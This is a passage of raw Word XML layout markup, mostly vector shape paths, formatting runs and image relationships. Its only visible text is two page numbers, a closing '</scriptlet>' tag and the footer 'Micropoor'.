079,2275,1081,2275,1082,2275,1084,2275,1086,2275,1088,2275,1090,2275,1092,2275,1094,2275,1096,2275,1099,2275,1101,2275,1103,2275,1106,2275,1108,2275,1111,2275,1114,2275,1116,2275,1119,2275,1122,2275,1125,2275,1128,2275,1131,2275,1134,2275,1137,2275,1141,2275,1144,2275,1148,2275,1151,2275,1155,2275,1159,2275,1162,2275,1166,2275,1170,2275,1174,2275,1178,2275,1183,2275,1187,2275,1191,2275,1196,2275,1201,2275,1205,2275,1210,2275,1215,2275,1220,2275,1225,2275,1230,2275,1235,2275,1241,2275,1246,2275,1252,2275,1257,2275,1263,2275,1269,2275,1275,2275,1281,2275,1287,2275,1293,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2274,1300,2274,1300,2274,1300,2274,1300,2274,1300,2274,1300,2274,1300,2274,1300,2273,1300,2273,1300,2273,1300,2273,1300,2273,1300,2272,1300,2272,1300,2272,1300,2272,1300,2271,1300,2271,1300,2271,1300,2270,1300,2270,1300,2269,1300,2269,1300,2269,1300,2268,1300,2268,1300,2267,1300,2267,1300,2266,1300,2266,1300,2265,1300,2265,1300,2264,1300,2263,1300,2263,1300,2262,1300,2261,1300,2261,1300,2260,1300,2259,1300,2258,1300,2257,1300,2256,1300,2256,1300,2255,1300,2254,1300,2253,1300,2252,1300,2251,1300,2250,1300,2249,1300,2247,1300,2246,1300,2245,1300,2244,1300,2243,1300,2241,1300,2240,1300,2239,1300,2237,1300,2236,1300,2234,1300,2233,1300,2231,1300,2230,1300,2228,1300,2227,1300,2225,1300,2223,1300,2221,1300,2220,1300,2218,1300,2216,1300,2214,1300,2212,1300,2210,1300,2208,1300,2206,1300,2204,1300,2202,1300,2200,1300,2197,1300,2195,1300,2193,1300,2190,1300,2188,1300,2185,1300,2183,1300,2180,1300,2178,1300,2175,1300,2172,1300,2170,1300,2167,1300,2164,1300,2161,1300,2158,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1300,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1299,2155,1298,2155,1298,2155,1298,2155,1298,2155,1298,2155,1297,2155,1297,2155,1297,2155,1296,2155,1296,2155,1296,2155,1295,2155,1295,2155,1294,2155,1294,2155,1293,2155,1293,2155,1292,2155,1291,2155,1291,2155,1290,2155,1289,2155,1288,2155,1288,2155,1287,2155,1286,2155,1285,2155,1284,2155,1283,2155,1282,2155,1281,2155,1280,2155,1278,2155,1277,2155,1276,2155,1274,2155,1273,2155,1272,2155,1270,2155,1269,2155,1267,2155,1265,2155,1264,2155,1262,2155,1260,2155,1258,2155,1256,2155,1254,2155,1252,2155,1250,2155,1248,2155,1245,2155,1243,2155,1241,2155,1238,2155,1236,2155,1233,2155,1231,2155,1228,2155,1225,2155,1222,2155,1219,2155,1216,2155,1213,2155,1210,2155,1207,2155,1203,2155,1200,2155,1196,2155,1193,2155,1189,2155,1186,2155,1182,2155,1178,2155,1174,2155,1170,2155,1166,2155,1161,2155,1157,2155,1153,2155,1148,2155,1144,2155,1139,2155,1134,2155,1129,2155,1124,2155,1119,2155,1114,2155,1109,2155,1104,2155,1098,2155,1093,2155,1087,2155,1081,2155,1075,2155,1069,2155,1063,2155,1057,2155,1051,2155,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:112.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2250,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2250;top:1030;width:130;height:270" coordorigin="2250,1030" coordsize="130,270" path="m2275,1045l2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2275,1045,2276,1045,2276,1045,2276,1045,2276,1045,2276,1045,2276,1045,2276,1045,2276,1045,2276,1045,2277,1045,2277,1045,2277,1045,2277,1045,2277,1045,2277,1045,2278,1045,2278,1045,2278,1045,2278,1045,2279,1045,2279,1045,2279,1045,2280,1045,2280,1045,2280,1045,2281,1045,2281,1045,2282,1045,2282,1045,2283,1045,2283,1045,2284,1045,2284,1045,2285,1045,2285,1045,2286,1045,2286,1045,2287,1045,2288,1045,2288,1045,2289,1045,2290,1045,2291,1045,2291,1045,2292,1045,2293,1045,2294,1045,2295,1045,2296,1045,2297,1045,2298,1045,2299,1045,2300,1045,2301,1045,2302,1045,2303,1045,2304,1045,2305,1045,2306,1045,2308,1045,2309,1045,2310,1045,2312,1045,2313,1045,2314,1045,2316,1045,2317,1045,2319,1045,2320,1045,2322,1045,2324,1045,2325,1045,2327,1045,2329,1045,2331,1045,2332,1045,2334,1045,2336,1045,2338,1045,2340,1045,2342,1045,2344,1045,2346,1045,2349,1045,2351,1045,2353,1045,2355,1045,2358,1045,2360,1045,2362,1045,2365,1045,2367,1045,2370,1045,2373,1045,2375,1045,2378,1045,2381,1045,2384,1045,2386,1045,2389,1045,2392,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1045,2395,1046,2395,1046,2395,1046,2395,1046,2395,1046,2395,1047,2395,1047,2395,1047,2395,1047,2395,1048,2395,1048,2395,1049,2395,1049,2395,1049,2395,1050,2395,1050,2395,1051,2395,1052,2395,1052,2395,1053,2395,1053,2395,1054,2395,1055,2395,1056,2395,1057,2395,1057,2395,1058,2395,1059,2395,1060,2395,1061,2395,1062,2395,1063,2395,1065,2395,1066,2395,1067,2395,1068,2395,1070,2395,1071,2395,1073,2395,1074,2395,1076,2395,1077,2395,1079,2395,1081,2395,1082,2395,1084,2395,1086,2395,1088,2395,1090,2395,1092,2395,1094,2395,1096,2395,1099,2395,1101,2395,1103,2395,1106,2395,1108,2395,1111,2395,1114,2395,1116,2395,1119,2395,1122,2395,1125,2395,1128,2395,1131,2395,1134,2395,1137,2395,1141,2395,1144,2395,1148,2395,1151,2395,1155,2395,1159,2395,1162,2395,1166,2395,1170,2395,1174,2395,1178,2395,1183,2395,1187,2395,1191,2395,1196,2395,1201,2395,1205,2395,1210,2395,1215,2395,1220,2395,1225,2395,1230,2395,1235,2395,1241,2395,1246,2395,1252,2395,1257,2395,1263,2395,1269,2395,1275,2395,1281,2395,1287,2395,1293,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2395,1300,2394,1300,2394,1300,2394,1300,2394,1300,2394,1300,2394,1300,2394,1300,2393,1300,2393,1300,2393,1300,2393,1300,2393,1300,2392,1300,2392,1300,2392,1300,2392,1300,2391,1300,2391,1300,2391,1300,2390,1300,2390,1300,2390,1300,2389,1300,2389,1300,2388,1300,2388,1300,2387,1300,2387,1300,2386,1300,2386,1300,2385,1300,2385,1300,2384,1300,2383,1300,2383,1300,2382,1300,2381,1300,2381,1300,2380,1300,2379,1300,2378,1300,2377,1300,2377,1300,2376,1300,2375,1300,2374,1300,2373,1300,2372,1300,2371,1300,2370,1300,2369,1300,2367,1300,2366,1300,2365,1300,2364,1300,2363,1300,2361,1300,2360,1300,2359,1300,2357,1300,2356,1300,2354,1300,2353,1300,2351,1300,2350,1300,2348,1300,2347,1300,2345,1300,2343,1300,2342,1300,2340,1300,2338,1300,2336,1300,2334,1300,2332,1300,2330,1300,2328,1300,2326,1300,2324,1300,2322,1300,2320,1300,2317,1300,2315,1300,2313,1300,2310,1300,2308,1300,2305,1300,2303,1300,2300,1300,2298,1300,2295,1300,2292,1300,2290,1300,2287,1300,2284,1300,2281,1300,2278,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1300,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1299,2275,1298,2275,1298,2275,1298,2275,1298,2275,1298,2275,1297,2275,1297,2275,1297,2275,1296,2275,1296,2275,1296,2275,1295,2275,1295,2275,1294,2275,1294,2275,1293,2275,1293,2275,1292,2275,1291,2275,1291,2275,1290,2275,1289,2275,1288,2275,1288,2275,1287,2275,1286,2275,1285,2275,1284,2275,1283,2275,1282,2275,1281,2275,1280,2275,1278,2275,1277,2275,1276,2275,1274,2275,1273,2275,1272,2275,1270,2275,1269,2275,1267,2275,1265,2275,1264,2275,1262,2275,1260,2275,1258,2275,1256,2275,1254,2275,1252,2275,1250,2275,1248,2275,1245,2275,1243,2275,1241,2275,1238,2275,1236,2275,1233,2275,1231,2275,1228,2275,1225,2275,1222,2275,1219,2275,1216,2275,1213,2275,1210,2275,1207,2275,1203,2275,1200,2275,1196,2275,1193,2275,1189,2275,1186,2275,1182,2275,1178,2275,1174,2275,1170,2275,1166,2275,1161,2275,1157,2275,1153,2275,1148,2275,1144,2275,1139,2275,1134,2275,1129,2275,1124,2275,1119,2275,1114,2275,1109,2275,1104,2275,1098,2275,1093,2275,1087,2275,1081,2275,1075,2275,1069,2275,1063,2275,1057,2275,1051,2275,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:172.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3450,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:3450;top:1030;width:130;height:270" coordorigin="3450,1030" coordsize="130,270" path="m3476,1045l3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3476,1045,3477,1045,3477,1045,3477,1045,3477,1045,3477,1045,3477,1045,3477,1045,3477,1045,3478,1045,3478,1045,3478,1045,3478,1045,3479,1045,3479,1045,3479,1045,3479,1045,3480,1045,3480,1045,3480,1045,3481,1045,3481,1045,3481,1045,3482,1045,3482,1045,3483,1045,3483,1045,3484,1045,3484,1045,3485,1045,3485,1045,3486,1045,3486,1045,3487,1045,3488,1045,3488,1045,3489,1045,3490,1045,3490,1045,3491,1045,3492,1045,3493,1045,3494,1045,3494,1045,3495,1045,3496,1045,3497,1045,3498,1045,3499,1045,3500,1045,3501,1045,3502,1045,3503,1045,3505,1045,3506,1045,3507,1045,3508,1045,3510,1045,3511,1045,3512,1045,3514,1045,3515,1045,3516,1045,3518,1045,3520,1045,3521,1045,3523,1045,3524,1045,3526,1045,3528,1045,3529,1045,3531,1045,3533,1045,3535,1045,3537,1045,3539,1045,3541,1045,3543,1045,3545,1045,3547,1045,3549,1045,3551,1045,3554,1045,3556,1045,3558,1045,3561,1045,3563,1045,3565,1045,3568,1045,3571,1045,3573,1045,3576,1045,3579,1045,3581,1045,3584,1045,3587,1045,3590,1045,3593,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1045,3596,1046,3596,1046,3596,1046,3596,1046,3596,1046,3596,1047,3596,1047,3596,1047,3596,1047,3596,1048,3596,1048,3596,1049,3596,1049,3596,1049,3596,1050,3596,1050,3596,1051,3596,1052,3596,1052,3596,1053,3596,1053,3596,1054,3596,1055,3596,1056,3596,1057,3596,1057,3596,1058,3596,1059,3596,1060,3596,1061,3596,1062,3596,1063,3596,1065,3596,1066,3596,1067,3596,1068,3596,1070,3596,1071,3596,1073,3596,1074,3596,1076,3596,1077,3596,1079,3596,1081,3596,1082,3596,1084,3596,1086,3596,1088,3596,1090,3596,1092,3596,1094,3596,1096,3596,1099,3596,1101,3596,1103,3596,1106,3596,1108,3596,1111,3596,1114,3596,1116,3596,1119,3596,1122,3596,1125,3596,1128,3596,1131,3596,1134,3596,1137,3596,1141,3596,1144,3596,1148,3596,1151,3596,1155,3596,1159,3596,1162,3596,1166,3596,1170,3596,1174,3596,1178,3596,1183,3596,1187,3596,1191,3596,1196,3596,1201,3596,1205,3596,1210,3596,1215,3596,1220,3596,1225,3596,1230,3596,1235,3596,1241,3596,1246,3596,1252,3596,1257,3596,1263,3596,1269,3596,1275,3596,1281,3596,1287,3596,1293,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3596,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3595,1300,3594,1300,3594,1300,3594,1300,3594,1300,3594,1300,3593,1300,3593,1300,3593,1300,3593,1300,3592,1300,3592,1300,3592,1300,3592,1300,3591,1300,3591,1300,3591,1300,3590,1300,3590,1300,3589,1300,3589,1300,3588,1300,3588,1300,3587,1300,3587,1300,3586,1300,3586,1300,3585,1300,3585,1300,3584,1300,3583,1300,3583,1300,3582,1300,3581,1300,3580,1300,3580,1300,3579,1300,3578,1300,3577,1300,3576,1300,3575,1300,3574,1300,3573,1300,3572,1300,3571,1300,3570,1300,3569,1300,3568,1300,3567,1300,3566,1300,3565,1300,3563,1300,3562,1300,3561,1300,3559,1300,3558,1300,3557,1300,3555,1300,3554,1300,3552,1300,3550,1300,3549,1300,3547,1300,3546,1300,3544,1300,3542,1300,3540,1300,3539,1300,3537,1300,3535,1300,3533,1300,3531,1300,3529,1300,3527,1300,3525,1300,3522,1300,3520,1300,3518,1300,3516,1300,3513,1300,3511,1300,3509,1300,3506,1300,3504,1300,3501,1300,3498,1300,3496,1300,3493,1300,3490,1300,3487,1300,3485,1300,3482,1300,3479,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1300,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1299,3476,1298,3476,1298,3476,1298,3476,1298,3476,1298,3476,1297,3476,1297,3476,1297,3476,1296,3476,1296,3476,1296,3476,1295,3476,1295,3476,1294,3476,1294,3476,1293,3476,1293,3476,1292,3476,1291,3476,1291,3476,1290,3476,1289,3476,1288,3476,1288,3476,1287,3476,1286,3476,1285,3476,1284,3476,1283,3476,1282,3476,1281,3476,1280,3476,1278,3476,1277,3476,1276,3476,1274,3476,1273,3476,1272,3476,1270,3476,1269,3476,1267,3476,1265,3476,1264,3476,1262,3476,1260,3476,1258,3476,1256,3476,1254,3476,1252,3476,1250,3476,1248,3476,1245,3476,1243,3476,1241,3476,1238,3476,1236,3476,1233,3476,1231,3476,1228,3476,1225,3476,1222,3476,1219,3476,1216,3476,1213,3476,1210,3476,1207,3476,1203,3476,1200,3476,1196,3476,1193,3476,1189,3476,1186,3476,1182,3476,1178,3476,1174,3476,1170,3476,1166,3476,1161,3476,1157,3476,1153,3476,1148,3476,1144,3476,1139,3476,1134,3476,1129,3476,1124,3476,1119,3476,1114,3476,1109,3476,1104,3476,1098,3476,1093,3476,1087,3476,1081,3476,1075,3476,1069,3476,1063,3476,1057,3476,1051,3476,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:157.199pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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78" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8212" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>148</w:t>
      </w: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54" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="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seFELayout/>
    <w:ulTrailSpace/>
  </w:compat>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9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webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20.jpeg"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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>